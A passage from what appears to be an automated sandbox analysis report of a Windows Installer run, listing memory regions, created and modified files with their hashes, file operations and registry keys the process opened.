| nsi.dll | 0x77b00000 | 0x77b05fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 45 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\jpenum\appdata\local\temp\history\history.ie5\desktop.ini | 0.04 KB |
MD5:
fffa3520c04320177050aa7c77c362e1
SHA1: e0f9e1ee1115bf5599d8c1430f4b9989ac3143e4 SHA256: 68cfdeb4843fd56030848aeab87b86582f429080caea55d7a1f31b7a9e2e155f SSDeep: 3:0NdQDjotjIAXs:0NwoyAXs |
|
|
| c:\users\jpenum\appdata\local\temp\history\history.ie5\desktop.ini | 0.14 KB |
MD5:
ba96961f5e22882527919e19daea510f
SHA1: e10e8bebbd0573e3a1494ea3f21682f7490c427b SHA256: dace5ad59099429d8aed4ee279f1263efb65d64456931398465a396cf0e79bd7 SSDeep: 3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovZeLhzUzYcB:0NwoyAXNxW28CEI7QyyZeNUzxB |
|
|
| C:\Windows\Installer\MSI81A0.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| c:\users\jpenum\appdata\local\temp\~df407b72869e744829.tmp | 0.50 KB |
MD5:
bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 SSDeep: 3:: |
|
|
| C:\Windows\Installer\a6cfff.ipi | 20.00 KB |
MD5:
13dcdb97a37b18e053c6ec56012b187d
SHA1: 1fb252bfb82c4ec9da5825665b243193703c2893 SHA256: 9ef634a98b3994acd7662c870fd2026fc27f17a97cdc01a1874e597229395e19 SSDeep: 48:8M2B39dtbu2+KOvlBuUJVHdASAp0uSicYOvAbdASsOvvrlpj:8LB3g5llBdJV+0WcBOxpj |
|
|
| C:\Windows\Installer\MSI504.tmp | 156.01 KB |
MD5:
6ddcd0652b02be46033cf067345ab620
SHA1: a6c9588293a88eeb8f20cb7fb33fba2b65910409 SHA256: b47f07be855ff9c70860856cf512427cc4b130da1607c55781a2e1c7233b596e SSDeep: 3072:0karRKLIauTODUD239BsvJWMPGD35qTtdZi+:TLIavDUDSuvnGDg1i+ |
|
|
| C:\Windows\Installer\MSID0F9.tmp | 131.00 KB |
MD5:
a06ba919e980d32e0ebe80ddfa099524
SHA1: 2a1c0cbec1cbf5774a6d00fc3a14d2ce979026d1 SHA256: b8074d53c56f7deb5832af3894ec20a21d1162252f177984807eb30fc1152fc8 SSDeep: 3072:BkarRKLIauTODUD239BsvJWMPGD35qTtdZ:+LIavDUDSuvnGDg1 |
|
|
| c:\users\jpenum\appdata\local\temp\history\history.ie5\desktop.ini | 0.09 KB |
MD5:
c50f9efcbb6d5346a8d11cdbf4df75f3
SHA1: 60e90da92d770d45500fb1f3a8a3186e14318912 SHA256: db79a15dce337e66cc45fafa371c057eb121360569122a8092d3b3e2972a1753 SSDeep: 3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovn:0NwoyAXNxW28CEI7Qyyn |
|
|
| c:\users\jpenum\appdata\local\temp\~df71e053e6f3c7d4ba.tmp | 68.00 KB |
MD5:
b837f9f74a93c63541185253c2dc583a
SHA1: bf1e5336bd69f8831a5127227db1c523cb32e7aa SHA256: ab2820a44213dd22c9ca52f83638e58422e69eb0798698f984725f8aae5caa6a SSDeep: 48:Qj2lrfdASsOvNdASAp0uSicYOvAQGGOvlBul:Qj2MOA0WcPGRlBC |
|
|
| C:\Windows\Installer\MSI81A0.tmp | 2.97 MB |
MD5:
3b492beae3a48d7e9eb420571c1e8356
SHA1: 01fb0896e612ef9ca0ec981087e8ac8201e26149 SHA256: 6b287b271706696a6d63e37c31be1ebf6483dd9d53c40428bc8b371cc1c34e83 SSDeep: 49152:YhbvWeD1soj7Ba3DaMNtklBXTdVTPT0GStMCtijo:wnD6oj7iJuNTXT70Gwtij |
|
|
| C:\Config.Msi\a6d000.rbs | 0.07 KB |
MD5:
9c035c1f1fd99090f94bc1db10edf0c3
SHA1: 1e2c8e69e7a3159c72ad880bf7842624bddb50b9 SHA256: 6d32514009798d3bb5110497641808fb36f7059833c2a717f31ff8e257288ffd SSDeep: 3:ElcqCLEllYA/vll+llJXtmmvllXllXn:Ea3LMmAe/qW |
|
|
| c:\users\jpenum\appdata\local\temp\history\history.ie5\desktop.ini | 0.05 KB |
MD5:
727675d3579482f4d0e4d1063806e492
SHA1: 56392ef9456107e89cd102a69d12a84b376504ba SHA256: 45465070215b849bb278e47849a8f2ca986a17299e055b41afbdc09f0cf3c012 SSDeep: 3:0NdQDjotjIAXNamv:0NwoyAXNxv |
|
|
| C:\Windows\Installer\a6cfff.ipi | 20.00 KB |
MD5:
d1b39760f6e1be7c44ebacf0908e5c11
SHA1: 7e0e34d3417b54dd8920e27ea20b977e51d0a17d SHA256: d67b6804cd05912270ca632da34e1d304fc65a5df87fd9856047ce90a5331bad SSDeep: 48:o0gcDHQbuaKOvlBuUJVHdASAp0uSicYOvAbdASsOvvrlpj:olCallBdJV+0WcBOxpj |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\jpenum\appdata\local\temp\history\history.ie5\index.dat | 16.00 KB |
MD5:
d7a950fefd60dbaa01df2d85fefb3862
SHA1: 15740b197555ba8e162c37a60ba655151e3bebae SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a SSDeep: 3:qRFiJ2totWIlXllll:qjyx |
|
|
| c:\users\jpenum\appdata\local\temp\temporary internet files\content.ie5\index.dat | 32.00 KB |
MD5:
777a1be14ca9df724f6ac1f470194b0a
SHA1: 8b52e77e167435bddad31eae2df4e04256782233 SHA256: 692202f2c086ecd363d06d6c41db7cf1a319f68ff5f38418cb1fe060ccb170b0 SSDeep: 3:qRFiJ2totWIltvl3sl5ll4NzugqXZullSh/1/txRt/r/i//llevRR//:qjyxEUhAXZu/SJj1ji1IRX |
|
|
Host Behavior
COM (4)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4 | 79EAC9EE-BAF9-11CE-8C82-00AA004BA90B | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 00000323-0000-0000-C000-000000000046 | 00000146-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
3 |
File (829)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Installer\MSI81A0.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\$PatchCache$\Managed\00005109110000000000000000F01FEC\CacheSize.txt | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\CacheSize.txt | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\a6cfff.ipi | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\MSID0F9.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\MSI504.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\MSI504.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Installer\MSI504.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE |
|
1 | |
| Create | C:\Config.Msi\a6d000.rbs | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Config.Msi\a6d000.rbs | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Config.Msi\a6d000.rbs | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE |
|
1 | |
| Create Directory | C:\MSI6cffe.tmp | - |
|
1 | |
| Create Temp File | C:\Windows\Installer\MSI81A0.tmp | path = C:\Windows\Installer, prefix = MSI |
|
1 | |
| Create Temp File | C:\Windows\Installer\MSID0F9.tmp | path = C:\Windows\Installer, prefix = MSI |
|
1 | |
| Create Temp File | C:\Windows\Installer\MSI504.tmp | path = C:\Windows\Installer, prefix = MSI |
|
1 | |
| Create Temp File | C:\Config.Msi\MSI66C.tmp | path = C:\Config.Msi, prefix = MSI |
|
1 | |
| Create Temp File | C:\Config.Msi\MSI6F9.tmp | path = C:\Config.Msi, prefix = MSI |
|
1 | |
| Get Info | C:\Windows\Installer\MSI81A0.tmp | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32\sxs.DLL | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\$PatchCache$\UnManaged\S-1-5-21-1276836803-1479805768-3330128443-1000\1DB4C8E0922C7994F88F5CFD1713D191 | type = file_attributes |
|
6 | |
| Get Info | C: | type = file_attributes |
|
3 | |
| Get Info | C:\MSI6cffe.tmp | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\ | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\ | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer | type = file_attributes |
|
21 | |
| Get Info | C:\Windows\Installer\$PatchCache$\Managed | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\$PatchCache$\Managed\ | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\$PatchCache$\Managed\00005109110000000000000000F01FEC\CacheSize.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\CacheSize.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\$PatchCache$\UnManaged | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\a6cfff.ipi | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\a6cfff.ipi | type = file_type |
|
1 | |
| Get Info | C:\Windows\Installer\a6cfff.ipi | type = file_attributes |
|
5 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\MsiExec.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Installer\MSI504.tmp | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Installer\MSI504.tmp | type = file_type |
|
2 | |
| Get Info | C:\Windows\Installer\MSI504.tmp | type = size |
|
1 | |
| Get Info | C:\Windows\Installer\MSI504.tmp | type = size |
|
1 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = file_attributes |
|
1 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = file_type |
|
2 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = file_attributes |
|
2 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = size |
|
1 | |
| Get Info | C:\Config.Msi | type = file_attributes |
|
1 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = file_type |
|
1 | |
| Get Info | C:\Config.Msi\a6d000.rbs | type = size |
|
1 | |
| Read | C:\Windows\Installer\MSI504.tmp | size = 1024, size_out = 1024 |
|
1 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 3818 |
|
1 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 8192 |
|
190 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 4124 |
|
1 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 1 |
|
190 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 8191 |
|
189 | |
| Write | C:\Windows\Installer\MSI81A0.tmp | size = 249 |
|
1 | |
| Write | C:\Windows\Installer\MSID0F9.tmp | size = 65536 |
|
2 | |
| Write | C:\Windows\Installer\MSID0F9.tmp | size = 3072 |
|
1 | |
| Write | C:\Windows\Installer\MSI504.tmp | size = 1024 |
|
156 | |
| Write | C:\Windows\Installer\MSI504.tmp | size = 8 |
|
1 | |
| Write | C:\Config.Msi\a6d000.rbs | size = 76 |
|
1 | |
| Delete Directory | C:\MSI6cffe.tmp | - |
|
1 | |
| Delete Directory | C:\Config.Msi | - |
|
1 | |
| Delete | C:\Windows\Installer\MSID0F9.tmp | - |
|
1 | |
| Delete | C:\Config.Msi\MSI66C.tmp | - |
|
1 | |
| Delete | C:\Windows\Installer\MSI504.tmp | - |
|
1 | |
| Delete | C:\Config.Msi\MSI6F9.tmp | - |
|
1 | |
| Delete | C:\Windows\Installer\MSI81A0.tmp | - |
|
1 |
Registry (575)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-18\Software\Policies\Microsoft\Windows\Installer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer | - |
|
17 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products | - |
|
35 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products | - |
|
35 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
18 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109090090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109090090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109090090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
17 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109110000000000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109110000000000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109110000000000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\000051091A0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\000051091A0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091A0090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\000051091E0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\000051091E0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051091E0090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\000051092E0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\000051092E0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\000051092E0090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109440090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109440090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109440090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109510090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109510090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109510090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109511090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109511090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109511090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109610090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109610090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109610090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109711090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109711090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109711090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109810090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109810090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109810090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109910090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109910090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109910090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109A10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109A10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109A10090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109AB0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109AB0090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109AB0090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109B10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109B10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B10090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109B21090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109B21090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109B21090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109C20090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109C20090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109C20090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109E60090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109E60090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109E60090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109F10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109F10090400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F10090400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109F100A0C00000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109F100A0C00000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100A0C00000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\00005109F100C0400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\00005109F100C0400000000000F01FEC | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00005109F100C0400000000000F01FEC | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\21EE4A31AE32173319EEFE3BD6FDFFE3 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\21EE4A31AE32173319EEFE3BD6FDFFE3 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\21EE4A31AE32173319EEFE3BD6FDFFE3 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\2246038675C7F37388062DC64EABA251 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\2246038675C7F37388062DC64EABA251 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\2246038675C7F37388062DC64EABA251 | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1276836803-1479805768-3330128443-1000\Installer\Products\22BEFC8F7E2A1793E9ADB411DEFE1C58 | - |
|
1 | |
| Open Key | HKEY_USERS\S-1-5-21-1276836803-1479805768-3330128443-1000\Software\Microsoft\Installer\Products\22BEFC8F7E2A1793E9ADB411DEFE1C58 | - |
|
